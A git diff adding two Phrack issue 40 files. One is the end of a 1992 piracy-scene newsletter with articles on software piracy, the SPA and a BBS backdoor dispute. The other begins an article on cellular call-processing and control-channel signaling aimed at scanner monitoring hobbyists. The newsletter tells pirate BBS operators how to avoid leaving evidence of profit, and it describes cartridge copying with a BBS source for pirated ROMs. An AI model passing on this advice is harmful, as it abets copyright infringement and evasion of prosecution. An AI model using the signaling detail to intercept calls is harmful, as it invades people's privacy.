+he gets annoyed."
+
+Geer also receives a huge number of requests for pirated software.  "A lot of
+users think that we can load up their hard disks with programs, even though
+they know they ought to be paying for them and just want to duck the fee."
+
+A few requests come from the truly naive, Geer says.  "I'll get a call for
+software support and I'll ask, What did the manual say?'  I didn't get a
+manual,' the person tells me.  A friend gave this to me.'  And then I have to
+explain that software isn't free."
+
+High software prices are a common user complaint.  Former WordPerfect executive
+vice president W.E."Pete" Peterson thinks the $495 list price of WordPerfect's
+best-selling word processing program is justified, however.  "WordPerfect sells
+about 150,000 copies a month at that price, so quite a few users think the
+price is justified, too," says Peterson.  "A computer costs anywhere from a few
+hundred to a few thousand dollars.  Without the software, the computer is
+worthless.  WordPerfect goes to a lot of work to write and support the
+software."
+
+The latter includes a costly policy of toll-free phone support, handled by
+operators who would just as soon not ask for a registration number.  It's an
+expensive way of showing trust, but it has paid off in excellent public
+relations.
+
+"We try to sympathize with people," says Jeff Clark, public relations director
+at XyQuest, the company that publishes XyWrite, a word processing program
+popular among journalists.  "We sell replacement manuals as a service to
+registered users, but there's a call at least once a week from someone who's
+obviously trying to get manuals to go with a pirated copy."
+
+The challenge then is to educate the caller, who may not even know that a law
+has been broken.  "All we ask of a registered user is to run the program on one
+machine at a time," Clark explains.  "If you're using it at work, yes, you can
+use it at home.  But don't buy one copy to use in an office of eight people."
+
+"A lot of people seem to think copying disks is OK because it's easy to do,"
+says Turner, who is also chairman of the SPA's companion organization, the
+Business Software Alliance, which fights international piracy.  "Then they call
+our tech line, and we're in the delicate position of telling them they're using
+a product illegally."
+
+Microsoft is even more benevolent.  "We like to know where the pirated copy
+originated," says Bill Pope, associate general counsel for the company.  "It's
+not always possible to learn over the phone who's pirating something, because
+we don't require that registration cards be returned.  But if we do identify a
+pirated copy, we'll help the user get it legally, and we may even supply a free
+copy of the program if we can learn where it came from."
+
+A highly publicized amnesty program was launched by the XTree Company in July
+of 1982.  For $20, anyone with a pirated copy of an XTree program was allowed
+to buy a license for the entry-level version of the program, thus getting
+access to the upgrade path.  Response was enthusiastic during the 90-day
+period, but the offer won't be repeated.  "You can't offer amnesty over and
+over," says Michael Cahlin, who markets the XTree products.  "You lose the
+respect of dealers and users who paid full price for it."
+
+Turner is more blunt about it.  "Amnesty encourages piracy.  I don't think it's
+been successful."
+
+While the SPA will continue to make headlines with Untouchables-style raids
+of corporate offices, Wasch also acknowledges that education is the key to
+fighting piracy.  A 12-minute, SPA-produced videotape entitled It's Just Not
+Worth the Risk spells out the message as a congenial corporate manager is made
+wise to the ways of the company pirate.
+
+"That tape has been a huge success," says Wasch.  "American Express bought 300
+copies, and Kimberly-Clark just ordered 100.  We've distributed about 10,000 of
+them so far."
+
+A self-audit kit, also available from the SPA, includes a program that
+determines what software is in use on your PC as well as sample corporate memos
+and employee agreement forms to promote piracy awareness.
+
+Seeing the Light
+
+Fear of being caught keeps many people honest, but some pirates will wait until
+they're forced to walk the plank before giving up.
+
+John Rackam says his BBS users are innocent.  "They can't afford the software,
+and they shouldn't have to pay," he says.  "They're downloaders.  They un-ARC it and say, This is nice!'  Then they never use it again."
+
+Charles Vane believes that software companies should give nonprofit
+organizations like his theater a break.  "If they give us packages, we'll give
+them publicity.  We'll print it in the program, we'll post it in the lobby.
+It's an upscale crowd that comes through here.  We just don't have the luxury
+of money.  I bought one program, ReportWriter, because it was cheap and good."
+
+For casual users, piracy may simply be a phase.  "I own 90 percent of the
+programs I use," says systems administrator Ed Teach.  "That's a big reverse
+from about four years ago, when 90 percent of them were bootlegs."
+
+And there's always the problem of well-meaning friends.  Henry Every, a
+journalist at a Florida newspaper, received pirated programs from friends when
+he bought his first computer five years ago.
+
+"I had all these programs and no idea how to use them," Every says.
+"Fortunately, the bookstore had guides that were even better than the manuals,
+and I became something of a power user.  Then I became the guy that a friend of
+a friend would call for help with his machine.  Next thing I know, I'm the one
+giving away pirate copies.
+
+"But I won't do it anymore. I'm sick and tired of getting those calls all hours
+of the day and night asking me how to use the damn things."
+
+
+No Excuses Accepted
+
+"When I'm sitting across the table from them and they're looking really
+dog-faced, when I can see the whites of their eyes, it's hard to pull the
+trigger," says Ken Wasch, the head of the Software Publishers Association.
+"Nevertheless," he says, "I pull the trigger."
+
+Wasch is not a tender man when it comes to dealing with software pirates.  He
+has no patience for the typical excuses given by those who copy and use
+unlicensed software, and he offers the following responses to the common
+complaints he hears from the outlaws:
+
+*    The price is too high.
+
+"Hey I don't own a Mercedes Benz.  Why? The price is too high.  If you can't
+afford it, don't use it."
+
+*    It's better to test the real thing than a crippled or demo version.
+
+"The demos are normally very good.  They limit the number of records, or they
+don't save to the disk, or something.  It's enough."
+
+*    I'll pay for it later.
+
+"I doubt it."
+
+*    I won't get caught.
+
+Wasch laughs.  When he does so, you can't help but hope that he's laughing with
+you, not at you.  "Sooner or later . . ."
+
+
+How Microsoft Foiled the Pirates
+
+Imitation is flattering only when you don't lose money over it.  Many software
+packages are copied by clever pirates who duplicate disks, manuals, even
+packaging.  Microsoft has been hit often enough by counterfeiters that recent
+software releases, including the Windows 3.1 and MS-DOS 5.0 upgrade packages,
+were specially designed to be bootleg-proof.
+
+"Every component part was carefully designed or hand-picked for that reason,"
+says Kristi Bankhead, who works with Microsoft's general counsel on piracy
+issues.  "To the user, it should just look like an attractive box, but it
+allows us to tell at once if it's legitimate or not."
+
+That strategy paid off in March when FBI agents raided a quartet of Silicon
+Valley companies that were pulling in up to $600,000 a month distributing bogus
+copies of MS-DOS and Windows.
+
+Key components of the official, bootleg-proof box designs are colorful artwork
+and the use of holograms.  On the MS-DOS 5.0 upgrade box, a silver circle on
+the side offers an iridescent image of the logo.  A second hologram, a small
+rectangle on the side of the program manual shows through an expensive die-cut
+hole on the other side of the box.  The interlocked letters D-O-S are printed
+in a four-color process that results in complicated mixtures that defy
+reproduction.  Even the way the box is folded and the flaps are glued and
+tucked is unique, it's not a common style, and counterfeiters must either spend
+time and money to copy it or risk quick discovery.
+
+Even as the DOS upgrade package was being readied for market last year, police
+detectives uncovered a Los Angeles based pirate ring that was already working
+on full-scale knockoffs of it.  "We got them while they were in the process of
+completing the DOS 5.0 artwork," said Bankhead, "but we could tell how bad it
+would look.  For instance, they were using a piece of foil for the hologram,
+and it had no three-dimensional image."
+
+   Top 10 Pirate BBS Downloads
+
+   1. Windows 3.1 (Microsoft)
+   2. Excel 4.0 (Microsoft)
+   3. Norton Utilities 6.0 (Symantec)
+   4. WordPerfect for Windows 5.1 (WordPerfect)
+   5. Stacker 2.0 (Stac Electronics)
+   6. AutoMap (AutoMap)
+   7. Procomm Plus 2.0 (Datastorm Technologies)
+   8. PC Tools Deluxe 7.1 (Central Point Software)
+   9. QEMM-386 6.0 (Quarterdeck Office Systems)
+   10. WordPerfect 5.1 (WordPerfect)
+
+It looks familiar.  It's very close to a recent Top 10 list of legitimate
+programs.  That's not surprising, since popular programs are also the most-
+often swiped.
+
+The list above was compiled from a survey of pirate BBS's, with help from John
+Rackam.  He explains that activity is so brisk the profile changes from week
+to week, with games being the most transitory items (which is why they're
+impossible to track).  Because non-disclosure doesn't exist in the pirate world
+and exchanging beta copies of software is a pirate tradition, Windows 3.1 won a
+strong position even before its official release.  By the way, there's only a
+cursory interest in OS/2 2.0, which is ominous news for IBM if pirate interest
+is any barometer of sales.
+_______________________________________________________________________________
+
+ Software Publishers Association:  Nazis or Software Police?
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ An Investigative Report by Rambone
+
+The Software Publishers Association (SPA) is the principal trade association of
+the microcomputer software industry.  Founded in 1984 by 25 firms, the SPA now
+has more than 750 members, which include major businesses, consumer and
+education software companies, and smaller firms with annual revenues of less
+than $1 million.  The SPA is committed to promoting the industry and protecting
+the interests of its membership.
+
+The SPA has two membership categories:  Full and Associate.  Software firms
+that produce, release, develop or license microcomputer software and are
+principally responsible for the marketing and sales of that software are
+eligible to apply for full membership status.  Firms that develop software, but
+do not publish are also eligible.  Associate membership is open to firms that
+do not publish software, but provide services to software companies.  These
+members include vendors, consultants, market research firms, distributors and
+hardware manufacturers.
+
+Lobbying
+
+The SPA provides industry representation before the U.S. Congress and the
+executive branch of government and keeps members up-to-date on events in
+Washington, D.C., that effect them.  The fight against software piracy is among
+its top priorities.  The SPA is the industry's primary defense against software
+copyright violators both in the United States and abroad.  Litigation and an
+ongoing advertising campaign are ways in which the SPA strives to protect the
+copyrights of its members.
+
+This is the impression that the SPA wants to give the general public, and for
+the most part, I have no problem with it.  During a lengthy conversation with
+Terri Childs of SPA, I was informed of several things.  The association's main
+source of information is from their hot-line and the calls are usually from
+disgruntled employees just waiting to get back at their former bosses.  An
+example of this is a company that had bought one copy of Microsoft Works, and
+with over 100 employees, they all seemed to be using the same copy.  One
+particular secretary had gotten fired, for what reason I do not know, so she
+called the SPA police and spilled her beans.  Once that happened the SPA got
+the balls rolling by instructing the Federal Marshals to get a warrant and
+storm the building like they own the place.  With a nifty little program they
+have that searches the machines for illegal copies of the software, they came
+up with the programs not registered to that machine.  *Bam!*, caught like a
+dead rat in a cage.  The SPA declined to comment on what has happened to that
+company since the raid, but they did say the company would be fined "X" amount
+of dollars for each illegal copy.
+
+Ms. Childs was very helpful though, she explained the idea behind the
+association, and what they stand for.  I was very impressed with what she had
+to say.  However, when I brought up the case concerning the Davy Jones Locker
+bust.  She told me she was not qualified to answer questions involving that
+case and directed me to Elaine Rosenthat.  So a few hours later I called her,
+and for a few brief moments she seemed to be quite helpful, but then decided to
+put me on a speaker phone with the founder of the "Association," Ken Wasch.
+
+>From the start I knew I would not get a straight answer out of him.   The first
+thing I asked him is if someone not in SPA obtained an account to get onto DJL,
+and then gave it to them with log captures from the BBS.  He would not give me
+a straight answer, just that SPA was able to obtain the information.  I then
+asked him what actions are being taken toward DJL and received another run
+around.
+
+Finally, I asked what type of fine would be likely to be handed down in this
+case.  He refused to give me an answer.
+
+But I did learn one very interesting little fact from all of this.  The money
+obtained by this incident and others like it do not go to the software
+companies who the SPA claims to be protecting.  Instead it goes right into the
+coffers of the SPA itself!  I guess they like to try those Mercedes.
+
+And here is a few more interesting little tidbits about the SPA.  Not only do
+they fine the companies for having illegal software and then pocket the money,
+but the annual charge for membership on the software companies can range
+anywhere from $700 to $100,000!  It seems to me that it is much more profitable
+to eradicate piracy than to participate in doing it.
+
+For those of you currently operating or considering operating a pirate bulletin
+board, I would suggest that you not charge your users for access.  Even if you
+claim that the money is only for hardware upgrades, in the long run, if you get
+busted, the money you collected will be evidence that suggests you were selling
+copyrighted software for financial gain.
+_______________________________________________________________________________
+
+ Vision-X Backdoor Nightmare
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Rambone
+
+There seems to be a fallacy in the pirate world that all BBS software is
+untouchable.  However, about a month ago a few people associated with the
+Oblivion team took apart .93 (a version number of Vision-X) and found
+backdoors.  The unfortunate problem with this is that the V-X team put those
+backdoors in so they could trace down which Beta site was giving out Beta copies.  Well, they found the backdoors and called up several boards and used
+them.
+
+1.  The story from the people who hacked the boards is this, one of the two
+    involved was irate becuase he wrote a registration for .93 so anyone could
+    run it, whether they paid for the software or not.  When the V-X team found
+    out about it, they blacklisted him from being able to logon into any V-X
+    system.  This was done hard-coded, so no sysop could let him in with that
+    handle.  Anyway, the story is they got into several of the BBSes, and even
+    dropped to DOS to look around, but did not have any intentions on 
+    destroying data.  Basically, they wanted to expose the weaknesses of the
+    software.  The problem started when they posted the backdoors on a national
+    net, which means that now any lamer could use this backdoor for their own
+    purpose.  According to the Oblivion guys, they did not destroy the data,
+    but some of the lamers that saw the backdoors on the net did.  They regret
+    posting the backdoors.  They didn't realize that there are some people who
+    are malicious enough to destroy data.
+
+2.  The Vision-X team are positive that the people who did take down the BBSes
+    were the Oblivion team, some say they even admitted to doing it.  There is
+    a major paradox in these stories, and at this point it doesn't look like
+    anyone will ever be able to get the entire truth about what had happened.
+
+Backdoors have never been a good idea, even if the authors are positive they
+will never be found.  The recent barrage of system crashing prove that the backdoors will indeed be found eventually.  On the flip side of the coin, even
+if backdoors in BBS software are found, they should be left alone to be used for their original intent.  Most authors who put the backdoors into the systems
+do it to protect their investment and hardwork.  Most BBS programers these days
+work on the software for the benefit of the modem community, and expect a
+little money in return for their hard work.  It is wrong for sysops to use it
+without permission.  You guys need to stop being cheap asses, and support a
+software you want support from.  What is the point of running a cracked piece
+of software since you cannot get support from the authors and not get the net
+they are involved in.  The nominal amount of money involved is a good
+investment in the future of your bbs.
+_______________________________________________________________________________
+
+ "BAD" Magazine Lives Up To Its Name
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Rambone
+
+I had never read Bad Magazine until recently.  Everywhere discussion about it
+had erupted, all I saw were comments that it was a waste of harddrive space.
+However, when Bad's eighth issue surfaced, I heard that there were a few
+disparaging remarks made about me and a spew of other loose information.
+
+So I went ahead and took a look at it, and what I found was one lie after
+another.  I have never seen a magazine so full of shit as BAD #8.  Apparently
+they seemed to think I mentioned them in Phrack magazine, "Bad Magazine got
+their first mention in the magazine Phrack."  The funny thing is, the only
+mention of BAD Magazine ever to appear in Phrack before now was a remark
+attributed to The Grim Reaper that I reprinted.
+
+I could care less about a pathetically lame magazine such as BAD and I never
+mentioned them and never intended on mentioning them until they raised the
+issue by taking a pot shot at me.
+
+"The Boys of Phrack however did not do their homework when mentioning this
+though."  This is a quote from BAD regarding comments made about Vision-X,
+which the article was not even about.  What they don't know is that I
+personally called The Grim Reaper and talked to him before putting anything in
+Phrack about his bust.  That's what the point of the article was about, not
+about some lame magazine named BAD and what they did.  They deemed me
+responsible for not backing up my facts, when in fact, I backed them all up.
+Grim Reaper's comments about Vision-X was not my concern, it was his bust for
+credit card abuse that I was interested in learning about.  The remarks
+concerning BAD were made by TGR, so it would appear that "the boys at BAD" did
+not do THEIR homework!
+
+"Rambone obviously does not get much exposure to the pirate world."  Yet
+another ridiculous and unsubstantiated remark.. You boys definitly did not do
+your homework, you better start asking around a little more before making
+irresponsable accusations.  The last words I will say about this is when
+people put a magazine together, they should try and find writers who will
+investigate facts instead of fabricating them.  If they actually read my
+article, they would have known that I did not say a word about their magazine,
+but rather quoted The Grim Reaper.  With writers such as those at BAD, I would
+not suggest anyone waste their time reading it, unless you are into tabloids
+like National Inquirer, but then at least some of their articles have a basis
+in fact.
+_______________________________________________________________________________
+
+ Games
+ ~~~~~
+Game Of The Month : Links 386 Pro
+
+ :     -*- Release Information -*-     :       -*- Game Information -*-       :
+
+ : Cracker           None              : Publisher       MICROPLAY            :
+ : Protection Type   None              : Graphics        SVGA Minimum         :
+ : Supplier          The Witch King    : Sound           All                  :
+ : Date of Release   07/13/92          : Rating [1-10]   10                   :
+
+Sorry guys for reprinting the information file, but I got lazy <g>.
+
+With the advent of the Super VGA Monitors, and the prices becoming more
+resonable, companies are starting to come out with special games to take
+advantage of SVGA mode.  Most of these games still will play in VGA mode so
+don't fret.
+
+One of the latest to date, and probably the best is Links 386 Pro, which the
+title indicates, at least a 386 is required.  The installation of the game is
+one of the most impressive I have ever seen, they cover every aspect of your
+hardware to take full advantage of it.  One of the harder things to swallow is
+that you must have at least 512k of memory on your VGA card, and it must comply
+by the VESA standard.  If it does, the instalation is smart enough to try and
+find one for you.
+
+The game it's self is a major improvement over it's predecessor, Links.  The
+graphics are much improved, which was a feat in itself, and many more options
+and bugs had been taken care of.  The company also listened to its customers
+and added many new features that were suggested.
+
+When first loading up 386 pro, you are greated by a backview of a course
+instead of the boring blank screen in the original.  From there, you can just
+about set up anything under the moon, from your club selection, to fairway
+conditions, and techture of the greens.  You can even select the wind
+conditions.  One of the most impressive features besides  the outstanding
+grahpics is the option to have multiple windows open while playing the game.
+
+Let's say you are at the first hole, about to drive one down the fairway, if
+you can make it there, you can also have another window up overlooking the
+fairway waiting to see where the ball is going to drop.  This is just one of
+many windows you can open, four at the most.  After playing it for quite
+sometime, I would only suggest one or two though.
+
+If you are contiplating buying a game to take advantage of your SVGA monitor,
+look no further than Links 386 Pro.  It's the wave of the future, and it's here
+now.
+_______________________________________________________________________________
+
+ No Longer Buy Console, Copy Them
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Special Thanks Snow Dog
+
+The following is an information excerpt on the GameDoctor.  Basically, you can
+buy a machine called the GameDoctor hook it up to your PC and copy the rom data
+over to your HD in a compresed format.  From there, you can send it over the
+nets, through the modem, or bring it to a friend's house.  You hook the
+GameDoctor up to your PC, hook your console game to the GameDoctor and transfer
+the compressed data file onto a blank cartridge.  Wow, instant Super Mario
+brothers.  There will be a more in-depth review of this machine in the next
+issue, for now, here's a little taste.
+
+Snow Dog writes:
+
+The machines are external SCSI interface machines, about the size of a super
+NES but wider, and fitted for japanese (super famicom) cartridges.  They are
+made by electronics nippon, known as NEC in the States, and  friend has one
+that works on both his Amiga 2000 and his 486-33 (SCSI is universal).
+
+They include five disks of Famicom OS, which you can use on a logical harddisk
+partition of around six megs since SNES games are measured in MegaBITS and will
+NEVER get bigger than four meg or so, but the OS needs room.  Controllers et.
+al. plug into the copier units.
+
+If you take an SNES or Genesis cart out of their shell and put it in a SF
+shell, you can copy them too.  It works like teledisk, and Altered Reality in
+(303)443-1524 has console game file support. All you do is download it and use
+your own console copier to put it on a cart, or at your option if it is a SNES
+or Famico game, play it off your OS.  Genesis games don't work in the SF OS so
+you need to copy them to cartridge.
+
+There are Japanese copiers specifically for Mega Drive (Genesis) that will do
+the same except that the OS is Sega-specific and you'll eed to copy SNES games.
+There is also a NEC PC Engine (turbo graphics and super graphics) copier
+because they made the bloody system, but it is proprietary and it will only
+work with the turbo format.
+
+I have never seen or worked with an internal model, but there is an internal
+5.25" full height model in the NEC catalog...I ordered the catalog after I saw
+an advertisement for it in the back of Electronic Gaming Monthly, and a rather
+rich friend of mine went and bought the system.  He also bought the $130
+Japanese Street fighter II and copied it for all of us.  How nice of him!  Of
+course we had to buy the cartridges and pay him $20, but he made a $100 profit.
+Good deal for him!
+_______________________________________________________________________________
+
+Okay, that is it for now.  Greets go out to Cool Hand, Ford Perfect, Lestat,
+RifleMan, The CrackSmith, AfterMath, both Night Rangers, Kim Clancy, Bar
+Manager, Butcher, Venom, and all the couriers who help make things happen.
+
+Special thanks to Tempus for one kick ass ansi!
+
+Until next time, keep playing.
diff --git a/phrack40/6.txt b/phrack40/6.txt
new file mode 100644
index 0000000..aca3a37
--- /dev/null
+++ b/phrack40/6.txt
@@ -0,0 +1,1391 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 6 of 14
+
+  ***************************************************************************
+  *                                                                         *
+  *                            Cellular Telephony                           *
+  *                                 Part II                                 *
+  *                                                                         *
+  *                                    by                                   *
+  *                               Brian Oblivion                            *
+  *                                                                         *
+  *                                                                         *
+  * Courtesy of:       Restricted-Data-Transmissions (RDT)                  *
+  *                  "Truth Is Cheap, But Information Costs."               *
+  *                                                                         *
+  *                                                            June 1, 1992 *
+  ***************************************************************************
+
+In Phrack 38, I discussed the history of cellular telephony, monitoring
+techniques, and a brief description of its predecessors.  In Part II, I'll
+describe the call processing sequences for land-originated and mobile-
+originated calls, as well as the signaling formats for these processes.  I
+apologize for the bulk of information, but I feel it is important for anyone
+who is interested in how the network communicates.  Please realize that there
+was very little I could add to such a cut and dried topic, and that most is
+taken verbatim from Industry standards, with comments and addendum salt and
+peppered throughout.
+
+
+Call-Processing Sequences
+
+
+   Call-Processing Sequence for Land-Originated Calls
+
+
+ MTSO                       Cell Site                     Mobile Unit
+ ------------------------------------------------------------------------------
+                            1 -- Transmits setup channel data on paging channel
+                            2 ----------------------------Scans and locks on
+                                                          paging channel
+ Receives incoming call --- 3
+ and performs translations
+
+ Sends paging message ----- 4
+ to cell site
+                            5 -- Reformats paging
+                                 message
+                            6 -- Sends paging message
+                                 to mobile unit via
+                                 paging channel
+                            7 ----------------------------Detects Page
+                            8 ----------------------------Scans and locks on
+                                                          access channel
+                            9 ----------------------------Seizes setup channel
+                           10 ----------------------------Acquires sync
+                           11 ----------------------------Sends service request
+                           12 -- Reformats service request
+                           13 -- Performs directional locate
+                           14 -- Sends service request to MTSO
+ Selects voice channel --- 15
+ Sends tx-on command to -- 16
+ cell site
+                           17 -- Reformats channel designation message
+                           18 -- Sends channel designation message to mobile
+                                 unit via access channel
+                           19 -----------------------------Tunes to voice
+                                                           channel
+                           20 -----------------------------Transponds SAT
+                           21 -- Detects SAT
+                           22 -- Puts on-hook on trunk
+ Detects off-hook -------- 23
+ Sends alert order ------- 24
+                           25 -- Reformats alert order
+                           26 -- Sends alert order to mobile unit via blank-
+                                 and-burst on voice channel
+                           27 -----------------------------Alerts User
+                           28 -----------------------------Sends 10-kHz tone
+                           29 -- Detects 10-kHz tone
+                           30 -- Puts on-hook on trunk
+ Detects on-hook --------- 31
+ Provides audible ring --- 32
+                           33 -- Detects absence of 10-kHz tone
+                           34 -- Puts off-hook on trunk
+ Detects off-hook -------- 35
+ Removes audible ring ---- 36
+ and completes connection
+
+                         Time
+
+
+              Call-Processing Sequence for Mobile-Originated Calls
+
+ MTSO                       Cell Site                     Mobile Unit
+ ------------------------------------------------------------------------------
+                            1 -- Transmits setup channel
+                                 data on paging channel
+                            2 --------------------------- Scans and locks-on
+                                                          paging channel
+                            3 --------------------------- User initiates call
+                            4 --------------------------- Scans and locks-on
+                                                          access channel
+                            5 --------------------------- Seizes setup channel
+                            6 --------------------------- Acquires sync
+                            7 --------------------------- Sends service request
+                            8 -- Reformats service request
+                            9 -- Performs directional Locate
+                           10 -- Sends service request to MTSO
+Selects voice channel ---- 11
+Sends tx-on command to --- 12
+cell site
+                           13 -- Reformats channel designation message
+                           14 -- Sends channel designation message to mobile
+                                 unit via access channel
+                           15 --------------------------- Tunes to voice
+                                                          channel
+                           16 --------------------------- Transponds SAT
+                           17 -- Detects SAT
+                           18 -- Puts off-hook on trunk
+Detects off-hook --------- 19
+Completes call through --- 20
+network Time
+
+Let me review the frequency allocation for Wireline and non-Wireline systems.
+Remember that the Wireline service is usually provided by the area's telephone
+company, in my area that company is NYNEX.  The non-Wireline companies are
+usually operated by other carriers foreign to the area, in my area we are
+serviced by Cellular One (which is owned by Southwestern Bell).  Each company
+has its one slice of the electro-magnetic spectrum.  The coverage is not
+continuous, remember that there are also 800 MHz trunked business systems that
+also operate in this bandwidth.  Voice channels are 30 KHz apart and the Data
+channels are 10 KHz apart.
+
+
+Frequency Range         Use
+----------------------------------------------------------------------
+870.000 - 879.360       Cellular One (mobile input 825.000 - 834.360)
+880.650 - 890.000       NYNEX (mobile input 835.650 - 845.500)
+890.000 - 891.500       Cellular One (mobile input 845.000 - 846.500)
+891.500 - 894.000       NYNEX (mobile input 846.500 - 849.000)
+879.390 - 879.990       Cellular One (data)
+880.020 - 880.620       NYNEX (data)
+
+The data streams are encoded NRZ (Non-return-to-zero) binary ones and zeroes
+are now zero-to-one and one-to-zero transitions respectively.  This is so the
+wideband data can modulate the transmitter via binary frequency shift keying,
+and ones and zeroes into the modulator MUST now be equivalent to nominal peak
+frequency deviations of 8 KHz above and below the carrier frequency.
+
+
+   PUTTING IT ALL TOGETHER - Signaling on the Control Channels
+
+The following information will be invaluable to the hobbyist that is monitoring
+cellular telephones via a scanner and can access control channel signals.  All
+information released below is EIA/TIA -- FCC standard.  There are a lot of
+differences between cellular phones, but all phones must interface into the
+mobile network and talk fluently between each other and cell sites.  Therefore,
+the call processing and digital signaling techniques are uniform throughout the
+industry.
+
+
+   MOBILE CALL PROCESSING
+
+        Calling:
+
+Initially, the land station transmits the first part of its SID to a mobile
+monitoring some control channel, followed by the number of paging channels, an
+ESN request, then mobile registration, which will either be set to 0 or 1.
+When registration is set to one, the mobile will transmit both MIN1 and MIN2
+during system access, another 1 for discontinuous (DTX) transmissions, read
+control-filler (RCF) should be set to 1, and access functions (if combined with
+paging operations) require field setting to 1, otherwise CPA (combined paging
+access) goes to 0.
+
+        Receiving:
+
+As the mobile enters the Scan Dedicated Control Channels Task, it must examine
+signal strengths of each dedicated control channel assigned to System A if
+enabled.  Otherwise System B control channels are checked.  The values assigned
+in the NAWC (Number of Additional Words Coming) system parameter overhead
+message train will determine for the mobile if all intended information has
+been received.  An EDN field is used as a crosscheck, and control-filler
+messages are not to be counted as part of the message.  Should a correct BCH
+code be received along with a non-recognizable overhead message, it must be
+part of the NAWC count train but the equivalent should not try and execute the
+instructions.
+
+Under normal circumstances, mobiles are to tune to the strongest dedicated
+control channel, receive a system parameter transmission, and, within 3
+seconds, set up the following:
+
+        o  Set SID's 14 most significant bits to SID1 field value.
+
+        o  Set SID's least significant bit to 1, if serving system status
+           enables, or to zero if not.
+
+        o  Set paging channels N to 1 plus the value of N-1 field.
+
+        o  Set paging channel FIRSTCHP as follows:
+                If SIDs = SIDp then FIRSTCHPs = FIRSTCHPp (which is an 11-bit
+                paging channel).
+                If SIDs = SIDp and serving system is enabled, set FIRSTCHPs to
+                initial dedicated channel for system B.
+                If SIDs = SIDp and serving system is disabled, set FIRSTCHPs to
+                first dedicated control channel for system B.
+
+        o  Set LASTCHPs to value of FIRSTCHPs + Ns -1.
+
+        o  Should the mobile come equipped for autonomous registration, it
+           must:
+
+                o Set registration increment (REGINCRs) to its 450 default
+                  value.
+
+                o Set registration ID status to enabled.
+
+I know that was a little arcane sounding but it's the best you can do with
+specifications.  Data is data, there is no way to spruce it up.  From here on
+out a mobile must begin the Paging Channel Selection Task.  If this cannot be
+completed on the strongest dedicated channel, the second strongest dedicated
+channel may be accessed and the three second interval commenced again.
+Incomplete results should result in a serving system status check and an
+enabled or disabled state reversed, permitting the mobile to begin the Scan.
+Dedicated control Channels Task when channel signal strengths are once more
+examined.
+
+Custom local operations for mobiles may be sent and include roaming mobiles
+whose home systems are group members.  A new access channel may be transmitted
+with a new access field set to the initial access channel.  Autonomously
+registered mobiles may increment their next registered ID by some fixed value,
+but the global action message must have its REGINCR field adequately set.
+Also, so that all mobiles will enter the Initialization Task and scan dedicated
+control channels, a RESCAN global action message must be transmitted.
+
+Mobile stations may be required to read a control-filler message before
+accessing any system on a reverse control channel.
+
+System access for mobiles is sent on a forward control channel in the following
+manner.  Digital Color Code (DCC) identifies the land is carried with the
+system parameter overhead message overload class fields are set to zero among
+the restricted number, and the remainder set to 1.  Busy-to-idle status (BIS)
+access parameters go to zero when mobiles are prevented from checking on the
+reverse control channel and the message must be added to the overhead.  When
+mobiles can't use the reverse control channel for seizure messages attempts or
+busy signals, access attempt parameters must also be included in the overhead.
+And when a land station receives a seizure precursor matching its digital color
+code with 1 or no bit errors, busy idle bits signals on the forward control
+channel must be set to busy within 1.2 milliseconds from the time of the last
+bit seizure.  Busy-idle bit then must remain busy until a minimum of 30 msec
+following the final bit of the last word of the message has been received, or a
+total of 175 msec has elapsed.
+
+        Channel Confirmation
+
+Mobiles are to monitor station control messages for orders and respond to both
+audio and local control orders even though land stations are not required to
+reply.  MIN bits must be matched.  Thereafter, the System Access Task is
+entered with a page response, as above, and an access timer started.
+
+This time runs as follows:
+
+        o  12 seconds for an origination
+        o  6 seconds for page response
+        o  6 seconds for an order response
+        o  6 seconds for a registration
+
+The last try code is then set to zero, and the equipment begins the Scan Access
+Channels Task to find two channels with the strongest signals which it tunes
+and enters the Retrieve Access Attempts Parameters Task.
+
+This is where both maximum numbers of seizure attempts and busy signals are
+each set to 10.  A read control-filler bit (RCF) will then be checked:  If the
+RCF equals zero, the mobile then reads a control-filler message, sets DCC and
+WFOM (wait for overhead message train before reverse control channel access) to
+the proper fields and sets the proper fields and sets the appropriate power
+level.  Should neither the DCC field nor the control-filler message be received
+and access time has expired, the mobile station goes to Serving System
+Determination Task.  But within the allowed access time, the mobile station
+enters the Alternate Access Channel Task.  BIS is then set to 1 and the WFOM
+bit is checked.  If WFOM equals 1, the station enters the Update Overhead
+Information Task; if WFOM equals 0, a random delay wait is required of 0 to 200
+msec, +/- 1 msec.  Then, the station enters the Seize Reverse Control Channel
+Task.
+
+Service Requesting is next.  This task requires that the mobile continue to
+send is message to the land station according to the following instructions:
+
+        o Word A is required at all times.
+        o Word B has to be sent if last try access LT equals 1 or if E requires
+          MIN1 and/or MIN2, and the ROAM status is disabled, or if the station
+          has been paged with a 2-word control message.
+        o Word C is transmitted with S (serial number) being 1
+        o Word D required if the access is an origination
+        o Word E transmitted when the access is an origination and between 9
+          and 16 digits are dialed.  When the mobile has transmitted its
+          complete message, an unmodulated carrier is required for another 25
+          milliseconds before carrier turnoff.  After words A through E have
+          been sent, the next mobile task depends on the type of access.
+
+Order confirmation requires entry into the Serving System Determination Task.
+
+     Origination means entry into the Await Message Task.
+     Page response, is the same as Origination.
+
+Registration requires Await Registration Confirmation, which must be completed
+within 5 seconds or registration failure follows.  The same is true for Await
+Message since an incomplete task in 5 seconds sends the mobile into the Serving
+System Determination Task.  Origination or Page response requires mobile update
+of parameters delivered in the message.  If R equals 1, the mobile enters the
+Autonomous Registration Task, otherwise, it goes to the Initial Voice Channel
+Confirmation Task.  Origination access may be either an intercept or reorder,
+and in these instances, mobiles enter the Serving System Determination Task.
+The same holds true for a page response access.  But if access is an
+origination and the user terminates his call during this task, the call has to
+be released on a voice channel and not control channel.
+
+If a mobile station is equipped for Directed Retry and if a new message is
+received before all four words of the directed retry message, it must go to the
+Serving System Determination Task.  There the last try code (LT) must be set
+according to the ORDQ (order qualifier) field of the message as follows:
+
+                If 000, LT sets to 0
+                If 0001, LT sets to 1
+
+Thereafter, the mobile clears the list of control channels to be scanned in
+processing Directed Retry (CCLIST) and looks at each CHANPOS (channel position)
+field contained in message words three and four.  For nonzero CHANPOS field,
+the mobile calculates a corresponding channel number by adding CHANPOS to
+FIRSTCHA minus one.  Afterwards, the mobile has then to determine if each
